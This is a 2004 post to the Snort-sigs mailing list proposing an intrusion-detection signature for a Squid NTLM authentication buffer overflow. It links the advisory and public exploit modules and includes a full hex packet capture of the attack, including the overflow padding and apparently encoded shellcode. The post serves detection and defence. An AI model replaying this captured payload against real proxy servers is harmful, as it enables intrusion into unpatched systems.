[Snort-sigs] signature: Squid NTLM Auth Overflow Exploit

Aaron W. DeLashmutt awd at ...2442...
Tue Jun 15 11:25:00 EDT 2004


Vulnerability:
http://www.idefense.com/application/poi/display?id=107

Exploit:
http://www.metasploit.com/projects/Framework/exploits.html#squid_ntlm_authenticate
http://www.k-otik.com/exploits/06132004.squid_ntlm_authenticate.pm.php

Signature:
alert tcp $EXTERNAL_NET any -> $HOME_NET 3128 (msg:"Squid NTLM Auth Overflow
Exploit"; content:"|4141 414a 4351 6b4a 4351 6b4a 4351 6b4a|"; offset:96;
classtype:misc-attack; sid:3000001; flow:to_server;
reference:url,www.idefense.com/application/poi/display?id=107;
reference:cve,CAN-2004-0541; rev:1;)

Packet log:
11:45:01.848725 xxx.xxx.xxx.xxx.34282 > xxx.xxx.xxx.xxx.squid: FP [tcp sum ok]
43:725(682) ack 1 win 5840 <nop,nop,timestamp 2642680769 603356512> (DF) (ttl
50, id 6190, len 734)
0x0000   4500 02de 182e 4000 3206 67c8 a784 4565        E..... at ...2546...
0x0010   d9a0 ff99 85ea 0c38 779b 1018 2162 a46a        .......8w...!b.j
0x0020   8019 16d0 13f9 0000 0101 080a 9d84 1bc1        ................
0x0030   23f6 7d60 5072 6f78 792d 436f 6e6e 6563        #.}`Proxy-Connec
0x0040   7469 6f6e 3a20 4b65 6570 2d41 6c69 7665        tion:.Keep-Alive
0x0050   0d0a 5072 6f78 792d 4175 7468 6f72 697a        ..Proxy-Authoriz
0x0060   6174 696f 6e3a 204e 544c 4d20 546c 524d        ation:.NTLM.TlRM
0x0070   5456 4e54 5541 4142 4141 4141 4277 4379        TVNTUAABAAAABwCy
0x0080   4277 4541 4351 4142 4141 4141 4151 4144        BwEACQABAAAAAQAD
0x0090   4141 4541 4141 413d 0d0a 0d0a 4745 5420        AAEAAAA=....GET.
0x00a0   6874 7470 3a2f 2f77 7777 2e6d 6574 6173        http://www.metas
0x00b0   706c 697a 6f69 742e 636f 6d20 4854 5450        plizoit.com.HTTP
0x00c0   2f31 2e30 0d0a 5072 6f78 792d 436f 6e6e        /1.0..Proxy-Conn
0x00d0   6563 7469 6f6e 3a20 4b65 6570 2d41 6c69        ection:.Keep-Ali
0x00e0   7665 0d0a 5072 6f78 792d 4175 7468 6f72        ve..Proxy-Author
0x00f0   697a 6174 696f 6e3a 204e 544c 4d20 546c        ization:.NTLM.Tl
0x0100   524d 5456 4e54 5541 4144 4141 4141 4c41        RMTVNTUAADAAAALA
0x0110   4573 4154 6741 4141 4142 4141 4541 4151        EsATgAAAABAAEAAQ
0x0120   4141 4141 4541 4151 4142 4141 4141 4151        AAAAEAAQABAAAAAQ
0x0130   4142 4141 4541 4141 4141 4141 4141 6977        ABAAEAAAAAAAAAiw
0x0140   4141 4141 6143 4141 4a42 5155 4642 5155        AAAAaCAAJBQUFBQU
0x0150   4642 5155 4642 5155 4642 5155 4642 5155        FBQUFBQUFBQUFBQU
0x0160   4642 5155 4642 5155 4642 5155 4642 5155        FBQUFBQUFBQUFBQU
0x0170   4642 5158 6a52 2f37 3959 3066 2b2f 2f77        FBQXjR/79Y0f+//w
0x0180   4141 414a 4351 6b4a 4351 6b4a 4351 6b4a        AAAJCQkJCQkJCQkJ
0x0190   4351 6b4a 4351 6b4a 4351 6b4a 4351 6b4a        CQkJCQkJCQkJCQkJ
0x01a0   4351 6b4a 4351 6b4a 4351 6b4a 4351 6b4a        CQkJCQkJCQkJCQkJ
0x01b0   4351 6b4a 4351 6b4a 4351 6b4a 4351 6b4a        CQkJCQkJCQkJCQkJ
0x01c0   4351 6b4a 4351 6b4a 4351 6b4a 4351 6b4a        CQkJCQkJCQkJCQkJ
0x01d0   4351 6b4a 4351 6b4a 4351 6b4a 4351 6b4a        CQkJCQkJCQkJCQkJ
0x01e0   4351 6b4a 4351 672b 782f 3265 375a 6443        CQkJCQg+x/2e7ZdC
0x01f0   5430 577a 484a 7353 6542 6378 6342 4151        T0WzHJsSeBcxcBAQ
0x0200   4542 672b 7638 3476 5177 7950 6267 6a46        EBg+v84vQwyPbgjF
0x0210   6b50 7354 4641 7a49 4577 326f 6a6d 6a48        kPsTFAzIEw2ojmjH
0x0220   5952 6948 5946 6a45 3468 6945 344a 7368        YRiHYFjE4hiE4Jsh
0x0230   4749 4744 4449 7350 3649 446c 4177 7762        GIGDDIsP6IDlAwwb
0x0240   466e 7367 6149 2b4d 7942 5744 4461 4f4e        FnsgaI+MyBWDDaON
0x0250   6c30 4332 6535 4174 466e 4f45 6344 6451        l0C2e5AtFnOEcDdQ
0x0260   506a 3459 6a4b 4d4d 6977 416a 4442 7354        Pj4YjKMMiwAjDBsT
0x0270   3549 7a49 4641 342f 6379 7754 4461 7352        5IzIFA4/cywTDasR
0x0280   624d 6754 4c42 5557 6c6a 5979 3876 694f        bMgTLBUWljYy8viO
0x0290   4a43 4d73 6978 4a73 7942 4d73 4778 504d        JCMsixJsyBMsGxPM
0x02a0   7942 5172 442b 7351 334d 6765 5037 5172        yBQrD+sQ3MgeP7Qr
0x02b0   4538 7a49 4577 7756 4670 4c69 3579 6157        E8zIEwwVFpLi5yaW
0x02c0   6b75 5932 6876 694f 4a52 556f 6a67 6d4c        kuY2hviOJRUojgmL
0x02d0   454b 7a49 4542 4151 453d 0d0a 0d0a             EKzIEBAQE=....


---
Aaron W. DeLashmutt <awd at ...2442...>





More information about the Snort-sigs mailing list